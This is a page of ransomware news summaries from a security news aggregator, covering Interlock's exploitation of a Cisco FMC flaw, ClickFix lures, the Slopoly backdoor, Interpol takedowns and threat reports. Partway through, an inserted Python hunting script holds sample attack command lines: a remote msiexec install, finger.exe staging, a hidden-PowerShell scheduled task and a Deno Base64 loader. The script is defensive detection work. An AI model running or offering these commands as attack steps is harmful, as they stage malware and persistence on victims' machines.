< ciso brief />

All news with #ransomware tag

419 articles · page 5 of 21

ThreatsDay: FortiGate RaaS, Citrix Exploits & Phish

🔔 ThreatsDay Bulletin highlights a wave of pragmatic, stealthy intrusions and continued abuse of lingering edge-device vulnerabilities. Notable findings include a nascent RaaS operation, The Gentlemen, exploiting CVE-2024-55591 against FortiGate appliances, a chained pre-auth RCE in BMC FootPrints, and active campaigns targeting Citrix NetScaler. The briefing underscores how small, well-crafted techniques, from deep-link MCP abuse to Teams phishing, are enabling remote access and data theft.

Interlock Ransomware Exploits Cisco FMC Zero-Day Patch Alert

🔒 Amazon Threat Intelligence analysis reveals that the Interlock ransomware group has exploited CVE-2026-20131, a critical RCE in the web-based management interface of Cisco Secure Firewall Management Center (FMC), in active attacks since January 26, 2026. The flaw permits an unauthenticated attacker to execute arbitrary Java code as root and carries a CVSS score of 10.0. Amazon recommends applying Cisco's patches, reviewing the published IoCs, and hunting for PowerShell staging, custom Java/JavaScript RATs, memory-resident webshells and unauthorized ScreenConnect deployments.

Interlock Ransomware Exploits Cisco FMC Zero-Day Campaign

⚠️ Amazon Threat Intelligence warns of an active Interlock ransomware campaign exploiting a critical Cisco Secure Firewall Management Center vulnerability tracked as CVE-2026-20131 (CVSS 10.0). The flaw enables insecure deserialization of a user-supplied Java byte stream, allowing unauthenticated remote code execution as root. Amazon telemetry shows zero-day exploitation since January 26, 2026, and the actor's toolkit includes multi-platform backdoors, reconnaissance scripts, and infrastructure-laundering components.

Interlock Ransomware Exploits Cisco FMC Zero-Day Campaign

🛡️ Amazon Threat Intelligence identified an active Interlock ransomware campaign exploiting CVE-2026-20131 in Cisco Secure Firewall Management Center, with exploitation observed beginning January 26, 2026, more than five weeks before Cisco publicly disclosed the flaw on March 4, 2026. A misconfigured attacker-controlled staging server exposed Interlock's full operational toolkit, including custom remote access trojans, reconnaissance scripts, a fileless Java webshell, and infrastructure-laundering scripts. Organizations running Cisco Secure FMC should immediately apply Cisco's patches, review the provided indicators of compromise, and hunt for signs of lateral movement and data staging.

Marquis Data Theft: 672,075 Records Exposed in 2025

🔒 Marquis, a Texas-based financial services provider, says a ransomware gang stole data for 672,075 people after compromising a SonicWall firewall on August 14, 2025. The attackers exfiltrated names, dates of birth, addresses, phone numbers, Social Security and Taxpayer Identification numbers, and financial account details without security codes. The breach disrupted operations at 74 banks and has prompted lawsuits and numerous consumer class actions.

LeakNet Adopts ClickFix and Deno In-Memory Loader Technique

🔒 LeakNet has begun using ClickFix lures on compromised websites to trick users into running malicious msiexec commands, according to ReliaQuest. The group pairs this social-engineering tactic with a staged, Deno-based in-memory loader that executes Base64-encoded JavaScript and pulls additional stages directly into memory, minimizing on-disk evidence. Post-compromise behavior is consistent and repeatable: DLL side-loading, lateral movement via PsExec, exfiltration to S3 storage, system and Kerberos-ticket fingerprinting (for example running klist via cmd.exe), and eventual ransomware deployment. ReliaQuest warns the approach reduces reliance on initial-access brokers, broadens access vectors, and is being seen across varied threat activity.

Ransomware TTPs and Shifting Threat Landscape — 2025

🔐 GTIG and Mandiant analysis of 2025 ransomware activity shows a shift toward data-theft extortion and toward targeting virtualization infrastructure, despite declining overall profitability for operators. Exploitation of VPNs and firewalls, increased abuse of legitimate tools and cloud services, and more aggressive extortion tactics produced a record number of data-leak-site postings. REDBIKE was the most frequently observed family, and defenders saw drops in reliance on Cobalt Strike and RMM tooling. Recommended actions include patching perimeter devices, hardening virtualization, improving backup resiliency, enforcing credential hygiene, and monitoring for anomalous data egress.

Interpol-led Operation Synergia III Nets 94 Arrests Worldwide

🔍 Interpol coordinated Operation Synergia III from 18 July 2025 to 31 January 2026, involving law enforcement units in 72 countries and private partners. The action produced 94 arrests, the seizure of 212 electronic devices and servers, and the takedown of some 45,000 malicious IP addresses, while 110 individuals remain under investigation. The operation targeted phishing, ransomware, romance scams and credit card fraud and disrupted infrastructure used to impersonate banks, government sites and payment services. Private-sector partners including Group-IB, Trend Micro and S2W supplied intelligence that helped identify hosting and malware distribution points.

INTERPOL Disrupts 45,000 Malicious IPs and Servers

🛡️ INTERPOL announced the takedown of 45,000 malicious IP addresses and servers linked to phishing, malware, and ransomware campaigns across 72 countries. The effort, part of Operation Synergia's third phase, resulted in 94 arrests, 212 devices seized and 110 suspects under investigation. Targeted actions in Bangladesh, Togo and Macau uncovered large fraud rings and over 33,000 phishing sites.

England Hockey Probes Alleged AiLock Ransomware Breach

🔒 England Hockey is investigating claims that the AiLock ransomware gang stole approximately 129GB of data and listed the organization on its leak site, threatening to publish files unless a ransom is paid. The governing body says it has prioritized an inquiry involving internal teams, external specialists, and cooperation with law enforcement. England Hockey cannot yet provide specifics while the investigation continues and urges members to remain vigilant for phishing and suspicious account activity.

Hive0163 Deploys AI-Assisted Slopoly in Ransomware Ops

🛡️ IBM X-Force researchers have linked a PowerShell backdoor called Slopoly to financially motivated group Hive0163 and report indicators that portions of the script were likely produced with a large language model. The builder-delivered payload establishes persistence via a scheduled task named Runtime Broker and was used to maintain access for more than a week in a 2026 ransomware incident. Slopoly beacons system details every 30 seconds, polls for commands every 50 seconds, executes via cmd.exe and returns results to a C2 server. Although the script lacks true self-modifying polymorphism, its comments, logging and naming conventions demonstrate how AI can accelerate malware development.

France: ANSSI Reports Fall in Ransomware Attacks 2025

🔒 The French cybersecurity agency ANSSI reported a decrease in known ransomware incidents in 2025, recording 128 attacks versus 141 in 2024. The agency attributed the decline partly to large-scale law enforcement actions and preventive interventions by cyber defenders, including Operation Endgame. Small and medium businesses remained the most targeted, while healthcare and education saw the sharpest increases. Prominent strains included Qilin, Akira and LockBit 3.0/LockBit Black.

Infosecurity Europe 2026 unveils keynote line-up and panels

🎤 Infosecurity Europe 2026 has revealed a major keynote programme for its 2–4 June event at ExCeL London, featuring industry founders, former intelligence leaders and elite-sport figures. Shlomo Kramer and Cynthia Kaiser headline Tuesday with sessions on technology trends and the ransomware economy, respectively, while Jason Fox will open Thursday with a resilience and decision-making keynote. Technical talks will address AI-driven cloud threats and preparations for post-quantum cryptography.

UK Cyber-Attacks Rise 36% YoY, Nearly Four Times the Global Rate

📈 The February 2026 Check Point Global Threat Intelligence report found UK organisations saw fewer weekly attacks per organisation (1,504) than the global average (2,086), but a 36% year-on-year increase, nearly four times the global 9.8% rise. Education, energy & utilities, government, healthcare and financial services were among the most frequently targeted UK sectors. Ransomware remained acute, with 49 active groups and a plurality of victims attributed to Qilin, Clop and The Gentlemen. The report also warned that widespread, unmanaged GenAI use is elevating inadvertent data-exposure risk, with one in 31 prompts judged high risk.

ESET Threat Intelligence Emerges as Strategic Game-Changer

🔍 ESET positions its threat intelligence and telemetry as essential tools for organizations facing increasingly sophisticated cyber threats, including AI-enabled attacks and convincing deepfakes. ESET Telemetry reports a 12% decline in overall detections in India (Jan–Aug 2025), but ransomware surged 70% from H2 2024 to H1 2025 and phishing remains the most common vector. The vendor bundles endpoint, XDR, identity protection, MDR, and analyst-driven APT reporting to help CIOs and CISOs stay ahead.

Global Cyber Attacks Stay Near Record Levels in Feb 2026

⚠️ Check Point Research reports that global cyber attack volumes remained near record highs in February 2026, with an average of 2,086 weekly attacks per organization—a 9.6% year‑over‑year increase and effectively flat month‑to‑month (-0.2%). While ransomware activity eased versus the same period last year, overall attack volumes grew due to automation, expanding digital footprints, and persistent exposure risks tied to enterprise GenAI use. The findings point to a sustained, high‑pressure threat environment that demands continuous risk management.

The Dirty Dozen: Active Ransomware Groups Today 2026

🔒 Ransomware-as-a-service (RaaS) has driven a rise in financially motivated attacks, combining double and triple extortion, data theft, and growing use of AI. Law enforcement disruptions have fragmented the marketplace and helped spawn new players such as Akira, BlackCat, and RansomHub. Attackers exploit unpatched VPNs, open RDP, phishing, and zero-day flaws to hit healthcare, manufacturing, education, telecom and critical infrastructure.

Ransomware Shift: From Loud Disruption to Stealth Tactics

🔒 Ransomware operators are shifting from noisy, disruptive attacks to covert, long-term intrusions focused on data theft and extortion. Picus Security's Red Report, based on simulations and analysis of 1.1 million malware files and 15.5 million MITRE-mapped actions, finds that the most common techniques aim to remain undetected. Adversaries increasingly chain vulnerabilities, route C2 through trusted services such as OpenAI and AWS, and favor persistence over immediate encryption, though some vendors dispute that overall activity has fallen.

Termite Ransomware Breaches Tied to ClickFix, CastleRAT

🔒 Researchers at MalBeacon observed the threat actor Velvet Tempest using a ClickFix malvertising chain to trick victims into pasting obfuscated commands into the Windows Run dialog. Operators leveraged nested cmd.exe chains and legitimate utilities (including finger.exe and csc.exe) to stage loaders, compile .NET components, and deploy Python-based persistence under C:\ProgramData. The intrusion staged DonutLoader and retrieved the CastleRAT backdoor, though Termite ransomware was not deployed during the observed activity.
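The ClickFix msiexec launch reported for LeakNet, the finger.exe/csc.exe staging from cmd.exe chains in the Termite item, the Deno in-memory loader, and the "Runtime Broker" scheduled task used by Slopoly all leave process-creation telemetry. The following is an added example, not code from ReliaQuest, IBM X-Force or MalBeacon: a small set of hunting rules run over constructed, Sysmon-style process-creation events. The pipe-delimited log format, the exact schtasks and deno command lines, the sample hostnames and addresses, and the rule thresholds are assumptions for illustration only.

```python
"""
Hunting rules for the ClickFix / LOLBin / scheduled-task behaviours summarised
above. Added illustration, not vendor or researcher code. Events are constructed,
pipe-delimited renderings of three Sysmon Event ID 1 fields (parent image, image,
command line); real input would be an EDR or SIEM export.
"""
import base64
import re
import shlex

# Constructed sample events (not taken from any real incident).
SAMPLE_EVENTS = [
    # ClickFix: Run dialog (explorer.exe parent) launching msiexec against a remote package
    r'parent=C:\Windows\explorer.exe|image=C:\Windows\System32\msiexec.exe|cmdline=msiexec /i https://cdn.example.invalid/verify.msi /qn',
    # LOLBin staging from a cmd.exe chain: finger.exe fetch, then csc.exe compile into ProgramData
    r'parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\finger.exe|cmdline=finger.exe stage@203.0.113.10',
    r'parent=C:\Windows\System32\cmd.exe|image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe|cmdline=csc.exe /out:C:\ProgramData\u.dll C:\ProgramData\u.cs',
    # Persistence: scheduled task named "Runtime Broker" (hypothetical schtasks form)
    r'parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|image=C:\Windows\System32\schtasks.exe|cmdline=schtasks /create /tn "Runtime Broker" /tr "powershell -w hidden -ep bypass -f C:\ProgramData\rb.ps1" /sc minute /mo 1',
    # Deno evaluating inline Base64 JavaScript (hypothetical loader invocation)
    r'parent=C:\Windows\System32\cmd.exe|image=C:\Users\u\.deno\bin\deno.exe|cmdline=deno eval --ext=js ZnVuY3Rpb24gbG9hZCgpe30=',
    # Benign controls: a local MSI install and a schtasks query
    r'parent=C:\Windows\explorer.exe|image=C:\Windows\System32\msiexec.exe|cmdline=msiexec /i C:\Users\u\Downloads\vendor-setup.msi',
    r'parent=C:\Windows\System32\svchost.exe|image=C:\Windows\System32\schtasks.exe|cmdline=schtasks /query /tn \Microsoft\Windows\Defrag\ScheduledDefrag',
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Split one constructed log line into basename-normalised fields."""
    fields = dict(part.split("=", 1) for part in line.split("|", 2))
    return {"parent": _basename(fields["parent"]),
            "image": _basename(fields["image"]),
            "cmdline": fields["cmdline"]}


def _tokens(cmdline):
    # posix=False keeps Windows backslashes literal and quoted arguments intact
    return shlex.split(cmdline, posix=False)


def _unquote(tok):
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def _looks_base64(tok):
    if not B64_RE.match(tok):
        return False
    try:
        base64.b64decode(tok, validate=True)
    except ValueError:
        return False
    return True


def match_rules(ev):
    """Return the names of every hunting rule the event triggers."""
    img, parent, cmd = ev["image"], ev["parent"], ev["cmdline"]
    toks = _tokens(cmd)
    low = [t.lower() for t in toks]
    hits = []
    # ClickFix: user-launched (explorer.exe parent) msiexec pulling a package over HTTP(S)
    if img == "msiexec.exe" and parent == "explorer.exe" and URL_RE.search(cmd):
        hits.append("clickfix_remote_msi")
    # finger.exe / csc.exe spawned from a cmd.exe chain: staging and compile-on-host
    if img in ("finger.exe", "csc.exe") and parent == "cmd.exe":
        hits.append("lolbin_staging_from_cmd")
    # schtasks creating a task named "Runtime Broker". Windows ships RuntimeBroker.exe
    # as a process, not as a scheduled task of that name (assumption: task made via schtasks)
    if img == "schtasks.exe" and "/create" in low and "/tn" in low:
        idx = low.index("/tn")
        if idx + 1 < len(toks) and _unquote(toks[idx + 1]).lower() == "runtime broker":
            hits.append("runtime_broker_task")
    # deno evaluating an inline Base64 blob (hypothetical loader invocation)
    if img == "deno.exe" and "eval" in low and any(_looks_base64(t) for t in toks):
        hits.append("deno_inline_base64")
    return hits


def detect(lines):
    """Run every rule over every line; returns (rule, image, cmdline) triples."""
    out = []
    for line in lines:
        ev = parse_event(line)
        for rule in match_rules(ev):
            out.append((rule, ev["image"], ev["cmdline"]))
    return out


if __name__ == "__main__":
    for rule, image, cmdline in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {image}: {cmdline}")
```

In practice the parent-image check is what separates a Run-dialog paste from a legitimate SCCM or Intune msiexec deployment, and the scheduled-task rule should be paired with Security event 4698 so tasks created through the Task Scheduler API rather than schtasks.exe are not missed.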

Ransomware Threats Increasingly Target Education Sector

🎓 Ransomware groups have shifted from encrypting files to extortion via stolen data, putting schools and universities at higher risk. Incidents in 2025–2026 include an attack on Sapienza University of Rome in February 2026, a vocational center in Treviso and Blacon High School, causing outages and operational disruption. Affordable, set-and-forget security that blocks phishing links and automatically scans USB devices can materially reduce exposure.